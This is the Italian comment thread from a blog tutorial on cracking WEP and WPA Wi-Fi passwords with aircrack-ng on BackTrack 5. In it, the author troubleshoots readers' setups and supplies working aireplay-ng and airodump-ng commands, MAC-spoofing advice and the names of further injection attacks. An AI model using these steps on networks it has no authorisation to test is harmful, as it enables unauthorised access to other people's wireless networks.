  • http://mauromarano.it Mauro

    @Diegos
    Ottimo ;)
    Ricordati però di fare esperimenti solo sulla tua rete!

  • http://mauromarano.it Mauro

    @helen
    Penso che tu abbia un po’ di confusione in testa :D Ma spero di chiarirti le idee ;)
    Questo tutorial si riferisce al crack di una rete wifi con cifratura WEP e non WPA (o WAP come la chiami tu). Per le password WPA il procedimento è completamente diverso. Se ti interessa sto scrivendo un tutorial anche per questo tipo di password ;)

  • Marco

    Vorrei chiederti perché quando scrivo nel terminale “airmon-ng” non compare niente in “Interface/Chipset/Driver” nonostante uso anche io un’antenna alfa network. Quando sono su win7 non ci sono problemi invece su backtrack5 non so perchè non mi trova niente. Anche se vado su Wicd mi dice “No wireless network found.” quando sono a meno di 50cm dal router.

  • http://mauromarano.it Mauro

    Anzi tutto sappi che se sei veramente a 50 cm dal router potresti essere in una zona d’ombra. Mai stare cosi vicini al router, se fai qualche prova con un analizzatore di rete noterai che il massimo segnale si trova sempre a qualche metro di distanza dal router.
    Detto questo, avvii BT nativamente o con una macchina virtuale?

  • Marco

    Lo avvio con vmware. L’ho detto in modo ironico che sono a 50 cm dal router.

  • http://mauromarano.it Mauro

    @Marco
    Non avevo afferrato l’ironia. Cmq è una cosa che in molti sottovalutano. Spesso si mette il router attacco al computer pensando di migliorare il segnale. Invece non è cosi..

    Se la tua chiavetta non viene visualizzata è perchè viene montata sul mac e non in BT. Assicurati che sia montata in vmware. Dovrebbe esserci un menu tipo “device” o “usb” dove puoi scegliere se collegare un dispositivo al mac o alla macchina virtuale.

  • Marco

    Nelle impostazioni ho Network adapter 1 e 2, ma non funziona lo stesso.

  • http://mauromarano.it Mauro

    Devi andare in virtual machines> USB

  • Marco

    Non posso installare backtrack 5 su una chiavetta e avviarlo come un s.o normale?
    se la risposta è si dovresti spiegarmi come installarlo e come avviarlo…

  • http://mauromarano.it Mauro

    Scarica l’iso di BT e usa unetbootin (http://unetbootin.sourceforge.net/) per creare una pennetta usb bootable!

  • Marco

    Non va…quando lo avvio dal bios si blocca alla schermata dove devo selezionare che backtrack devo usare(safe mode…default) e lì qualsiasi opzione scelgo non succede niente…

  • http://mauromarano.it Mauro

    Allora è un problema del tuo computer. Vorrei aiutarti ma senza avere il computer davanti posso fare poco.

    Io continuo a consigliarti di usare una macchina virtuale. Virtualbox è anche gratis.

  • Marco

    La sto scaricando, vediamo che succede…

  • Marco

    L’ho fatto partire su virtualbox, solo che quando vado sul terminale e ci scrivo airmon-ng non mi trova ancora niente…:(

  • Marco

    Quando provo a connettere un dispositivo usb mi dice connessione del dispositivo non riuscita.

  • Marco

    Risolto tutto dopo un po di prove. Grazie per l’aiuto! :)

  • http://mauromarano.it Mauro

    @Marco
    Cos’è che non andava?

  • Marco

    Praticamente una volta impostato l’usb dovevo riavviare la macchina virtuale… io invece lo selezionavo senza riavviare e mi dava errore. Adesso però non mi funziona l’attacco fake authentication mi dice “challange failure”…

  • Marco

    E poi non ho capito un’altra cosa una volta iniziata la raccolta dei pacchetti quando faccio aircrack-ng nomedelfile.cap fa il tentativo ogni 5000 IVs di trovare la password o la devo fare io…?

  • Marco

    Un’altra domanda se i due metodi che hai descritto di fake authentication falliscono..ci sono altri metodi? o bisogna aspettare la raccolta lentissima di pacchetti?

  • http://mauromarano.it Mauro

    @Marco
    Il tentativo lo fa aircrack-ng in maniera automatica. Quindi tu lo devi solo lanciare e aspettare che faccia i suoi tentativi ogni 5000ivs.

    Se non riesci ad autenticarti puoi fare qualcosa solo se ci sono altri client collegati al network.
    Basta che nei comandi di aireplay-ng aggiungi il parametro -h mac-adress-di-una-vittima. Cosi facendo farei credere al router che sei un client già collegato.

    Se il frangment attack fallisce ci si sono altri tipi di attacchi, come ho scritto anche nell’articolo ;)

  • Marco

    Quand’è che spiegherai anche gli altri attacchi? Poi ho letto che stai facendo una guida per la protezione WPA, a che punto stai?

  • http://mauromarano.it Mauro

    @Marco
    Ora sto lavorando alla guida per il WPA, poi penserò agli altri tipi di attacchi wep.

    Il tutorial per il WPA è quasi finito, penso di pubblicarlo nei prossimi 2-3 giorni ;)

  • Riccardo

    ciao mauro.. avrei 2 domande…
    1) xk provando a craccare sempre la stessa rete quando inserisco il comando aireplay mi viene scritto ”Sending Authentication Request (Open System)” una decina di volte finkè nn mi viene scritto processo fallito?(cioè certe volte ql comando ha successo e certe volte).
    2) xk quando inserisco il comando aireplay tt va come dovrebbe fino a quando o i pakketti si bloccano all’improvviso o continuano ad aumentare ma nella skermata (qll dopo il comando airodump) il numero #Data aumenta pianissimo nonostante mi dica ke sta continuando a collezzionare pakketti!
    GRAZIE spero di essere stato chiaro…

  • http://mauromarano.it Mauro

    @Riccardo
    Per favore evita il linguaggio stile sms ;)
    Per le tue domande non è ben chiaro cosa vuoi sapere. Aireplay viene unsato sia per fare una finta autenticazione sia per iniettare i pacchetti per far salire gli IVs! Spiega bene a quale dei due comandi ti riferisci :D

  • Marco

    Grazie mille per l’aiuto Mauro grazie a te adesso ho le idee più chiare. :)

  • felice

    ciao mauro c’è un modo con interfaccia grafica su backtrack 5? se c’è lo posti gentilmente?

  • Samuel

    Marco :

    Praticamente una volta impostato l’usb dovevo riavviare la macchina virtuale… io invece lo selezionavo senza riavviare e mi dava errore.

    Anche io ho problemi di riconoscimento della scheda di rete con virtualbox su win7 infatti quando do il comando airmon-ng non mi da niente.
    Invece se carico backtrack5 da boot va tutto bene ma non posso avere il tanto desiderato dual booting con win7.potreste gentilmente spiegarmi la procedura passo passo per il riconoscimento dell’interfaccia di rete di backtrack5 su virtualbox??
    grazie mille

  • Samuel

    ah scusate devo precisare che non uso una chiavetta USB ma la mia scheda wi-fi integrata : Atheros AR9285 (peraltro compatibile con la packet-injection) perfettamente funzionante quando carico backtrack5 da boot.
    VirtualBox riconosce la scheda infatti se vado su “dispositivi >> schede di rete”mi permette di selezionarla ma quando do il comando airmon-ng sul terminal di backtrack5 non mi riconosce niente.aiutatemi grazie

  • http://mauromarano.it Mauro

    @felice
    Si c’è un modo, ma conviene prima imparare a fare tutto da terminale. Altrimenti al primo intoppo, con l’interfaccia grafica, non vai avanti :D Cmq sto pensando anche ad una guida con l’interfaccia grafica.

    @Samuel
    Ho trovato questo post: http://forum.aircrack-ng.org/index.php?topic=8445.0 e pare che la tua scheda di rete NON funzioni dalla partizione windows. Il perchè non te lo so dire, ma cosi dicono :(
    Se vuoi un consiglio scarica unetbootin è creati una pennetta usb bootable con BT 5 ;)

  • Samuel

    Unetbootin, se non sbaglio, gia si trova nella suite backtrack5.cmq mi interessa sapere se è possibile il dual booting con win7 caricando backtrack5 dalla pennetta usb.grazie@Mauro

  • http://mauromarano.it Mauro

    @Samuel
    Si unetbottin è già incluso in BT, ma lo puoi scaricare anche per mac e win.

    Nel gergo informatico per “dual boot” si intende installare su un hardisk, in due partizioni diverse, due o più sistemi operativi in modo permanente. Avviare quindi BT via usb non significare avere un “dual boot”.

    Avviando BT via USB lo puoi usare normalmente nella versione live e volendo puoi anche installarlo su una seconda partizionare (ma qui non posso darti supporto perchè diventerebbe troppo lunga la cosa) o come sistema operativo principale. Se non sai cosa fare non smanettare con le partizioni perchè rischi di cancellare o rovinare la tua partizione principale!

  • Diegos

    Ciao Mauro, qualche giorno fa ho letto che, di li a poco, avresti pubblicato la guida per craccare le chiavi WPA con aircrack-ng su backtrack5.
    Mi chiedevo se fosse pronta.
    Ciao e grazie mille!

  • http://mauromarano.it Mauro

    @Diegos
    La guida è finita, la devo solo rivedere un pochino e poi la pubblico. La volevo pubblicare ad inizio della settimana che, ahimè, ormai è finita ma ho avuto poco tempo a disposizione :(
    Questione di un paio di giorni, tempo permettendo, e la troverai su queste pagine!

  • massimo

    Boss, abbiamo notizie sulla guida per WPA ?

    • http://mauromarano.it Mauro

      Ragazzi lo dovevo pubblicare diversi giorni fa. Purtroppo sto avendo degli inconveniente che non mi fanno dedicare a tempo pieno al tutorial.
      E’ questione di giorni cmq, è quasi finito.

  • Riccardo

    ciao! sto per installare backtack 5 su virtual box che ram e che hard disk mi consigli di assegnarli? (ho un pc con 4gb di RAM e hard disk da 320gb) grazie

  • http://mauromarano.it Mauro

    Io con 512 mb di ram vado benissimo! Se poi risulta che va un po’ lento aumentala un po..
    Come HD metti 15-20 GB tanto lo spazio non viene occupato tutto. QUello è lo spazio massimo che VB si può prendere. Quindi se non ci metti nulla non ti occuperà nulla..

  • MASSIMO

    Se quando faccio AIRCRACK-NG per decriptare, il risultato ottenuto è:

    KEY FOUND [F6:DC:A8:3A:56]
    Decrypted correctly 100%

    qual’è la pass da inserire?

  • http://mauromarano.it Mauro

    la password sarà F6DCA83A56
    Basta che cacci i due punti dalla stringa!

  • jonny

    Ciao,
    Prima di tutto grazie, la guida mi sembra fantastica…
    anche se io mi sono già bloccato all’inizio.

    Ho guardato tutti i vari commenti… ed in giro per il web, ma non ho risolto; perché se non ho capito male backtrack 5 dovrebbe averli già i driver per questa scheda di rete….-.-?? NO?
    Pur utilizzando la tua stessa scheda di rete, la “Alfa AWUS036H”
    quando inserisco il codice “airmon-ng” mi risponde ” Interface Chipset Driver “, ma non mi fa vedere nessuna scheda….
    Se puoi, come posso fare..?

    Aggiungo che ho installato backtrack 5 su VirtulBox, ed il mio sistema operativo di base è MAC OSX…

    Grazie mille…=)

  • http://mauromarano.it Mauro

    Ciao jonny, assicurati di aver connesso il dispositivo USB a virtualbox.
    Guarda questo screenshot: https://img.skitch.com/20110620-je63b44tbuah7n23fgtty1bjj3.jpg

  • Alessio

    Ciao Mauro, complimenti per il tutorial davvero ben fatto!
    Spero di vedere al più presto i tuoi tutorial sul wpa e sul funzionamento degli attacchi fragmentation e chopchop…
    Ho provato con la rete di casa mia e solo una volta ho ricevuto un errore di tipo “core dumped”, ma solo la prima volta, la seconda stranamente ha funzionato bene…
    Comunque sia, complimenti ancora per il sito!

  • http://mauromarano.it Mauro

    @Alessio
    Grazie mille :D

  • jonny

    ahaahah Era così semplice… non ci credo… =)
    Grazie mille, ora posso andare avanti…=)
    Ancora comlimenti…=)

  • http://mauromarano.it Mauro

    @jonny
    Grazie :D

  • Alessio

    Ciao Mauro,
    con questo commento non voglio farti fretta, però sai è da quando ho scoperto questo tuo spazio (pochi giorni fa, e ne approfitto per farti i complimenti per i contenuti) che ho gli occhi puntati per controllare se escono novità per gli altri tutorial citati da me due-tre commenti fa :D mi chiedevo se potevi comunicarci delle date, ufficiali o ufficiose.. Ribadisco che non voglio farti fretta con questo commento! Grazie, ciao!

  • èpropriolui

    Guida dettagliata e semplice, grandissimo!!

    Apsetto la tua guida sulla WPA ;)

  • èpropriolui

    ti volevo chiedere una cosa:
    Io ho un wifi che perfette l’injection (controllato sul wiki di backtrack) e infatti facendo aireplay-ng -9 (per il test) mi da un 100% positivo.
    Però quando inizio l’ignezione sul mio router i #DATA non aumentano e nell’elenco dei dispositivi collegati all’ap il mio pc lo indica e aumentano i pacchetti sotto la voce lost.
    A cosa è dovuto? al mio router che non permette l’injection? Grazie.

    • http://mauromarano.it Mauro

      Devi provare ad eseguire gli altri tipi di attacchi!
      Come dicevo nel tutorial ci sono tanti altri tipi di attacchi che, solitamente, funzionano.

  • Potens

    ciao…….sto provando ad istallare back track 5 su suppoto vituale (virtual box) sul sito di back trak ho trovato le spiegazioni ma nonnostate io le segua, riesco a lanciare il programma ma non a farlo partire. potresti dare quelche delucidazione? grazie

    P.S.ho un macbook con snowleopard

    • http://mauromarano.it Mauro

      Ciao, dovresti dirmi a che punto di blocchi altrimenti non so come aiutarti!

  • Massimo

    Ciao Mauro, volevo farti i complimenti per l’ottima guida. Inoltre volevo chiedere se hai più notizie sulla guida WPA perchè sarei molto interessato ad essa, mi pareva di aver capito che era finita e che nel giro di 3-4 giorni (dal 16 giugno) l’avresti pubblicata…

  • desmodue

    ciao, complimenti per la guida proprio ben fatta… e per le wpa? stessa procedura? ciao grazie

  • desmodue

    ops, non ho letto il post sopra..scusate..

  • PCN

    Ciao, innanzitutto volevo ringraziarti per la splendida guida, chiara e utile. Mi chiedevo se tu potessi darmi una mano con un problema: i data non aumentano, i beacons si, dopo piú di un ora sono a 40000 beacons e 0 data. Quando provo a lanciare l’attacco ovviamente non trova pacchetti, in piú l’injecton continua ad analizzare pacchetti, senza mai farmi la famosa domanda. Il taffico di rete c’é, la connessione é mia, ho attivato un download da un altro pc ma non ha fatto nessun effetto, da cosa puó dipendere secondo te?

  • luca

    ciao mauro, prima di tutto complimenti per l articolo sei davvero un fenomeno volevo chiederti per trovare una wpa invece serve un dizionario? e poi come faccio a crearne uno hai qualche link di un programma? e l ultima cosa una volta dentro backtrack come faccio a utilizzarlo? deve solo scrivere il nome del file come hai fatto tu con estensione .cap?

  • turbo

    salve come si cambia la lingua in backtrack 5 da inglese a italiano?

  • Chino

    Ciao Mauro, grazie mille per l’articolo, fondamentale anche per la conoscenza delle reti :-) . Volevo chiederti un’info. Come molti, ho montato Backtrack 5 su VirtualBox. La wifi è integrata nel mio portatile e la scheda di rete è una Broadcom 802.11n. Su backtrack riesco a connettermi con il browser konqueror, solo che sulla console, quando scrivo airmon-ng non mi individua nessuna scheda di rete… Potresti darmi una mano per risolvere il problema?
    Grazie ^^

  • Chino

    Un’altra cosa: non so se potrebbe riguardare il mio problema, ma su virtualbox, avviata la macchina, quando vado su Dispositivi USB collegati me ne da uno chiamato: “Dispositivo sconosciuto 0A5C:219C [0628]“. La cosa che non capisco è che con il browser posso connettermi ma non mi individua la scheda nella console. Inoltre quando vado nelle impostazioni di connessione su backtrack (K->Internet->Network Manager),dato che da qui mi prende due connessioni (di cui una mia), sul network manager non mi individua nulla

  • Chino

    Dimenticato di dire che se clicco su Dispositivo Sconosciuto mi da il seguente errore:
    Connessione del dispositivo USB Dispositivo sconosciuto alla macchina virtuale BackTrack 5 non riuscita.
    USB devide ” with UUID {165fd26a-b48c-4d5f-8a46-b266a60b089c} is busy with previous request. Please try again later

    Dettagli:
    Codice ‘uscita: E_INVALIDARG (0×80070057)
    Componente: HostUSBDevice
    Interfaccia: IHostUSBDevice {etc…….}

    Ora non so se questo dispositivo sconosciuto si riferisca alla scheda di rete, perché il mio pc è dotato anche di bluetooth integrato, è questo come dispositivo USB su backtrack me lo legge :-\

  • Chino

    Scusate un’altra volta xD il Dispositivo Sconosciuto non riguarda la mia scheda di rete… è un altro dispositivo (HD esterno xD).Come dispositivo USB che mi fa collegare (ma che poi cmq non mi da i risultati sperati) c’è Broadcom Corp Broadcom BCM2070 Bluetooth Device [0628]

  • luca

    ciao devi scaricare il pacchetto lingua.deb e poi installarlo su backtrack

  • luca

    ciao mauro scusa il disturbo ho provato l infectus suna rete wep e va alla grande, ma sua una wpa non mi crea nessun pacchetto , o meglio inizia.. read packets ma non compare mai use this packet? potresti darmi i comandi per provare altri attacchi?
    io ho usato aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (n° bssid) mon0

  • FreezMayer

    Ciao Mauro!! Davvero una gran bella guida!! Ti faccio i miei complimenti!!
    Purtroppo io ho un problema, o meglio, non so se e

    un problema ma dall

    ultimo comando eseguito nn succede piu nulla:
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1C:A2:1B:47:A9 mon0
    e sn arrivato a quasi 180000 packets e 0 #Data dopo 2 ore e 40 min e aspetto ancora con pazienza la domanda “Use this packet ?”
    Non so cosa fare? e` normale che faccia cosi?
    Tu in quanto tempo hai trovato la password?

  • FreezMayer

    ma non ce un`altro comando per farmare tutto e provare a trovare la password con i packets inviati fino ad ora?

  • Pet

    ciao mauro, chiedo a te ma se qualcuno sa per piacere risponda.
    è possibile usare back track 5 con la scheda wifi interna? mi avevano detto che mettendolo su usb e facendo partire il sistema operativo a quel punto l’avrebbe riconosciuta, ma non è stato cosi. consigli?

  • fioz

    salve mauro, bellissima guida, una delle più dettagliate, però ho un problema, non riesco ad attivare il monitor mode della mia scheda wifi, o meglio ci riesco ma non mi da il nome della scheda col monitoraggio attivo(es: mon0) e provando a mettere mon0 dice che non esiste, io non sapendo che fare ho attivato il monitor mode e mi dava solo: nome driver(monitor mode attivo) e al posto di mon0 e affini ho usato il nome della scheda wifi wlan0 durante tutti i comandi, alla fine però non mi scarica alcun pacchetto e #data resta a 0 :( consigli? grazie mille

  • Marco

    Quand’è che arriva la guida per wpa?

  • TRiM

    Ottima guida, ma vorrei sapere una cosa, come fai a fare lo split del terminale?
    Cosa bisogna modificare o installare?
    Grazie ;)

    • http://mauromarano.it Mauro

      Il normale terminale non permette lo spit dello schermo :)
      Dovresti scaricare un altro tipo di terminale :D

  • carmelo

    complimenti veramente

    • emanuele

      muaro grazie di tutto sei il piu’ chiaro del web… una domanda: non posso installare backtrack5 su una semplice chiavetta? voglio dire, avendo un portatile non sarebbe inutile avendo gia’la funzionalità del wifi? in che modo la injection di cui parlavi è influenzata dalla Alfa AWUS036H?? grazie, spero mi risponda.

      • http://mauromarano.it Mauro

        Ciao Emanuele, si è possibile installare backtrack 5 in una semplice pennetta. Dopo che avvi backtrack 5 puoi installare su una pennetta tramite l’utility unebootin già integrata in backtrack.

  • Carmelo

    @mauro scusami leggevo che avresti messo una guida per chopchop e fragment :D

  • Pippocalippo

    Ciao Mauro complimenti per la guida! sono settimane che provo a far riconosce la mia alfa a bt ma nn ce la faccio, ho provato a leggere i commenti… ma nn ho trovato niente di utile.
    Ho un macbook, virtualizzo su parallelsdesktop, bt 5 gnome 32b, alfa awus036nhr.

    Come gli altri quando dicito airmon-ng o iwconfig, non mi trova niente.
    Che impostazioni devo mettere su parallels? io metto la spunta sulla scheda alfa nelle opzioni usb e sulla rete. poi riavvio, vado sul terminale e non mi vede niente. Puoi consigliarmi qualcosa?!
    Tante grazie!

  • Pippocalippo

    ah dimenticavo… anche su kismac mi da il classico problema: “KisMAC was able to load the driver backend for USB RTL8187 device, but it was unable to create an interface. Make sure your capture device is properly plugged in. If you think everything is correct, you can try to restart your computer. Maybe your console.log and system.log show more details.”
    Boh!

  • Gambolinus

    Ciao Mauro ma con questa procedura è possibile craccare anche le reti WAP?Ci sto provando…

    • http://mauromarano.it Mauro

      Ovviamente no, vale solo per le reti WEP

  • Gambolinus

    Mi correggo WPA

  • Pippocalippo

    Per me niente… :-S

  • mitch90

    ehi mauro la tua guida funziona benissimo…solo una cosa…sto usando bt5 con wmware su windows 7…non riesco ad aprire una nuova finestra terminale per fare partire aireplay…come posso fare?

  • http://mauromarano.it Mauro

    @mitch90 devi semplicemente cliccare di nuovo sull’icona del terminale ;)

  • Pippocalippo

    Grazie mille Mauro.

    A casa mia si dice domandare è lecito, rispondere è cortesia… probabilmente lei non è nè cortese nè educato. Sarebbe bastato anche un: “mi dispiace non ho tempo di risponderti”

    Arrivederci.

  • http://mauromarano.it Mauro

    @Pippocalippo la tua è una domanda a cui ho risposto diverse volte. Leggi bene i commenti qua e su youtube troverai la soluzione.

  • Angelo

    @Pippocalippo: non siamo pagati da nessuno per rispondere ai commenti. Rispondiamo, appunto, per CORTESIA. Trova un’altro sito di informatica generale in cui vi sono risposte complete e rapide come questo nostro sito. Scriviamo per piacere. Aiutiamo per piacere di farlo. Se non rispondiamo, non credo che siamo colpevoli di qualche reato. Lamentare una cosa del genere, mi dispiace dirlo, ma non si addice a gente matura. Arrivederci!

  • Pippocalippo

    Se aveste risposto prima, non ci sarebbe stato nessun disguido. Tempo ne avete perso lo stesso mi pare… Non chiedevo soluzioni magistrali o un supporto tecnico, ma una semplice risposta del tipo “@Pippocalippo la tua è una domanda a cui ho risposto diverse volte. Leggi bene i commenti qua e su youtube troverai la soluzione.” senza che passavo il tempo a controllare e a essere ignorato come un idiota!

    Cmq ho risolto, su un altro blog, che ho trovato senza problemi e sempre non pagato come gran parte dei blogger (me compreso).

  • tonino

    Ciao Mauro , premetto che la tua guida è perfetta ma ho il problema che nè con la mia scheda wireless nè col pennino riesco a catturare sufficienti #data e inoltre l’injection non funziona,anzi rallenta sensibilmente i pacchetti….potresti indicarmi qualche sito con i comandi per altri tipi di attacchi?? ciao e grazie mille

  • http://mauromarano.it Mauro

    Ciao tonino, trovi tutto quello che ti serve sul sito di aricrack-ng.
    In particolare prova a dare un occhiata a questi tutorial: http://www.aircrack-ng.org/doku.php?id=tutorial

  • tonino

    Grazie Mauro, sono riuscito a trovare tutti i codici di ogni tipo di attacco. Grazie mille e grazie per il gran lavoro che fai. A presto

  • http://mauromarano.it Mauro

    @tonino mi fa piacere che ci sei riuscito :D

  • Pingback: [TUTORIAL ITA] Crack di una rete wifi con protezione WPA con AirCrack-ng su backtrack 5 | Mauro's Page

  • Andrea

    ehi ragazzi! ho visto il video, ma ho un problema: sferro l’attacco interactive per aumentare i pacchetti IVs, ma non aumentano! Mi viene posta la domanda “Use this packet?” digito y e do invio.
    Ma i pacchetti data sono fermi a 118 :(
    Cosa sbaglio?

    • http://mauromarano.it Mauro

      Trovi la risposta nell’articolo:
      “In questo primo esempio useremo l’attacco numero 2 chiamato interactive. Questo è l’attacco più semplice da utilizzare e spesso il più efficace.

      Potrebbe però non essere sempre efficace e generare nuovi IVs. Se ciò dovesse accadere dovete provare un attacco differente.”

      Devi fare un’altro attacco se non funziona quello.

  • http://mauromarano.it Mauro

    Prova

  • Danilo

    Ciao Mauro,ho una domanda,quando provo l inject gli ics non salgono vertiginosamente,anzi sono molto lenti,come si usano gli altri metodi per farli aumentare?

  • http://mauromarano.it Mauro

    Bè questo tutorial spiega solo un tipo di attacco. Se vuoi in questa pagina ufficiale trovi tanti tutorial su tanti tipi di attacchi http://www.aircrack-ng.org/doku.php?id=tutorial

    Prova a guardare l’attacco chopchop

  • http://[email protected] Francesco

    Mauro mi avevi già illuminato su questo argomento ma voglio prendermi il permesso di porti un ennesima domanda.

    Ho provato e i pacchetti ivs si accumulano solo nel caso che io spippoli su internet con la connessione che sto monitorando se non utilizzo la rete per niente gli ivs (DATA) siccome uso backtrack5 rimangono a O spaccato.

    A questo punto ti chiedo esiste un attacco o un modo per farsi inviare almeno un singolo pacchetto anche se nessuno sta lavorando con la reta sotto attacco?

    Perche a quel punto sboccherei la situazione e con l’attacco (-2) riuscirei ad aumentare l’accumulo.

    Io ho provato l’attacco caffè latte ma niente i pacchetti rimangono a 0

  • http://mauromarano.it Mauro

    Francesco se dai il comando aireplay-ng ti escono fuori tutti i tipi d’attacco.

    L’attacco caffè latte non mi ha mai risolto alcun problema, almeno con me non ha mai funzionato.

    Ti consiglio di guardare e documentarti sugli attacchi: interactive (-2) , arpreplay (-3) , chopchop (-4) e fragment (-5). Provando questi 4 attacchi sono sempre riuscito a ottenere quello che volevo.

    I primi da provare solo l’interactive e l’arpreplay in quanto sono i più semplici.

    Se hai seguito il tutorial ed hai usato l’interactive prova con l’arpreplay.

    Se nemmeno con l’arppreplay riesci allora devi provare con i chopchop e fragment che sono però un po’ più complicati!

    Sul sito di aircrack-ng (ho linkato tante volte il sito) trovi la descrizione di tutti gli attacchi e di come usarli.

    Purtroppo non ho potuto fare una descrizione di ogni attacco perchè ci sarebbe voluto troppo tempo qua.

  • Giuseppe

    Buongiorno Mauro, guida veramente ben fatta, ma vorrei capire una cosa:
    uso backtrack 5 su vmware, uso la chiavetta usb alfa descritta nell’articolo, ma non riesco in alcun modo a fare injection..c’è sicuramente qualcosa che mi sfugge e che non mi permette di fare la fake autentication in nessuno dei due modi descritti..puoi darmi qualche suggerimento??
    Grazie mille
    Saluti

    • http://mauromarano.it Mauro

      Purtroppo è difficile aiutarti in questo modo. Perchè ci sono migliaia di cose che potrebbero non andare bene.
      L’injection non funziona solo su una rete o su nessuna rete?

  • Giuseppe

    Ciao Mauro, ho provato dapprima con una rete wep generata dal mio telefono ( joikuspot) e poicon una del mio ufficio, devo effettivamente testarla magari su altro router… Vedro di postare se riesco.
    Grazie mille
    Ciao

  • soloman65

    Ciao Mauro, mi blocco qui : airodump-ng –bssid 00:1C:A2:1B:47:A9 -c 1 -w test-mauromarano.it mon0
    w serve per salvare tutti i dati in un file chiamato con il nome che segue a questa istruzione. Nel nostro caso il file si chiamerà test.mauromarano.it
    dove lo trovo il mio file?

    Grazie in anticipo …ciao

    • http://mauromarano.it Mauro

      Di default il file viene creato nella root del tuo account. Puoi salvarlo anche sul desktop specificando la path completa. Ad esempio, per salvarlo sulla scrivania, basta scrivere.

      airodump-ng –bssid 00:1C:A2:1B:47:A9 -c 1 -w /root/Desktop/test-mauromarano.it mon0

      • soloman65

        Grazie per la velocissima risposta, appena possibile proverò. Ciao

  • DionisOdam

    ciao Mauro, complimenti per l’articolo, dettagliatissimo e davvero ben fatto.
    Volevo farti alcune domande per avere maggiori chiarimenti e ovviamente sono domande di uno molto meno esperto di te.
    1. E’ indispensabile avere una chiavetta esterna,non e’ possibile eseguire lo scanning con il wifi integrato ad un portatile.

    1. al punto
      airodump-ng –bssid 00:1C:A2:1B:47:A9 -c 1 -w test-mauromarano.it mon0

    come risultato non mi trova nessuna rete, ho controllato tutti i parametri , cambiato il canale e fatto tutto correttamente ma niente. Potrebbe esser dovuto proprio al fatto che ho condotto il test senza la chiavetta esterna ?

    • http://mauromarano.it Mauro

      Guarda è necessaria avere una chiavetta esterna compatibile con l’injection per fare tutto nel modo corretto.

      Al posto di 00:1C:A2:1B:47:A9 hai messo il bssid dell’AP bersaglio, vero?

      • DionisOdam

        si si ho messo il bssid corretto, i parametri li ho configurati tutti facendo molta attenzione, l’unica cosa che mi manca e’ la chiavetta e mi chiedevo appunto se era possibile farlo senza.
        Un mio amico insisteva nel dire che si poteva fare, io sapevo che non era possibile ma ho voluto comunque il parere di un esperto! e me lo hai confermato! :-)

  • DionisOdam

    un ulteriore domanda:
    come posso capire se una chiavetta e’ compatibile con l’injection,
    quali parametri dovrei controllare affinche’ io possa comprare la penna giusta ?
    Grazie per le informazioni
    preziose e utilissime

    • http://mauromarano.it Mauro

      Ciao, ti conviene fare una ricerca su internet per trovare una lista di chiavette compatibili.
      O se vuoi andare sul sicuro devi comprare l’alfa che uso io!

      @taddoz mi dispiace ma non so come aiutarti con quella scheda di rete. PRova a fare una ricerca su google magari!

  • taddoz

    ciao, complimenti innazitutto per il tutorial. Io ho un dell inspiron 1545 processore “pentium dualcore T4200″ con scheda rete “dell wireless 1397 WLAN mini card”, ho installato backtrack e creato l’immagine su virtualbox, ho un solo problema, non riesco a capire che driver devo patchare, non ho ancora l’alfa network quindi volevo sapere se tu sai dirmi come fare per poter finalmente usare i tools di backtrack. grazie

  • caius

    ciao!intanto grazie mille della guida =) una sola domanda… ma la password dove si vede una volta trovata? scusate la domanda stupida =)

    • http://mauromarano.it Mauro

      Nell’ultimo passaggio la password ti esce dopo la scritta KEY FOUND!

  • vincenzo

    Come prima cosa complimenti e grazie!!!
    Ho una serie di problemi….ma mi limiterò ad uno per ora
    quando lancio aircrack e metto il file cap mi dice
    “please specify a dictionary (option-w)

    quitting aircrack-ng….
    Che faccio?

    • http://mauromarano.it Mauro

      Hum mi sembra strano. Forse non hai abbastanza pacchetti? Se mi posti tutto quello che ti esce scritto (da quando digiti il comando) forse posso capire un po’ meglio!

  • Gio

    Ciao Mauro! complimenti per la guida! è la migliore del web. ho solo un problema: quando cerco di fare il passaggio della falsa autenticazione ( o della cattura dell’handshake), mi dice che non può perchè la rete bersaglio è sul canale 11, e la mia interfaccia in monitor mode lavora su canale 1. Nei passaggi precedenti, però, io avevo creato l’interfaccia con le specifiche del canale su cui si trova la rete bersaglio… cosa devo fare? spero di essere stato più chiaro possibile. grazie in anticipo. :)

    • http://mauromarano.it Mauro

      Ciao Gio, guarda anche a me è capitato in passato quell’errore.

      A dir la verità non so a cosa sia dovuto.

      Ti spiego come ho fatto a risolverlo!

      Scollega la tua chiavetta wifi dal computer e riavvia backtrack 5. Una volta che si è riavviato collega di nuovo la chiavetta ed esegui di nuovo tutto d’accapo.

      Non ne ho la certezza, ma penso che questo sia un problema di “virtualizzazione”!

      Fammi sapere se risolvi!

      Ciao

  • http://Backtrack5r1soffredicecita'? luca

    Salve vi scrivo sulla dubbia mia persona efficacia di tale software,sto testando un mio ruter protetto con una chiave wpa,presa in precedenza dal dizionario presente,nel pc praticamente metto una passoword che lui ha nel dizionario,e non la riconosce li passa davanti e continua la sua ricerca,come’ possibile?Personalmente se non c’e’ una spiegazione logica,credo si tratti diuna bufala..eppure wpa handshake mi rileva la password ma una inventata da lui?Ce’ gentilmente qualcuno,che sappia perche’ fa cosi?Grazie

    • http://mauromarano.it Mauro

      Ciao Luca, puoi provare a spiegarti meglio? Non ho ben capito quello che hai fatto.

      Se vuoi fare una prova imposta una password wpa al tuo router, dopo di chè inserisci questa password nel dizionario e prova a sferrare l’attacco.

      Se fai tutto correttamente stai sicuro che la password viene trovata :)

      • giulio

        certo che la trova..e banalissimo,se io lascio in cucina una mela sul tavolo e vado via,dopo due ore la trovo sempre la…

  • Gio

    Ciao Mauro sono ancora io:) dopo vari tentativi sono riuscito a catturare l’handshake e procedere all’attacco dizionario, e sono riuscito a trovare la passwoord che avevo inserito. Con le protezioni wep però quando cerco di usare l’attacco “interactive”, come avevi detto tu non succede nulla. Puoi mandarmi un link dove vengono spiegati gli altri attacchi? (o se hai fatto delle guide tu ancora meglio). Comunque ho una teoria: può succedere questo se sono distante dalla rete? cioè più aumenta la distanza meno pacchetti ricevo con le conseguenze che ne conseguono? grazie in anticipo:)

    • http://mauromarano.it Mauro

      Ciao Gio, mi fa piacere che ci sei riuscito con la password wpa :D

      Per quanto riguarda la tua teoria: si, è anche dovuto alla distanza.

      Quando si tenta la cattura dei pacchetti possono influire tantissime cose:

      • distanza

      • interferenze

      • incompatibilità della tua scheda di rete

      • qualche strana protezione dell’AP bersaglio

      ecc.

      Qua trovi tutti i tutorial http://www.aircrack-ng.org/doku.php?id=tutorial

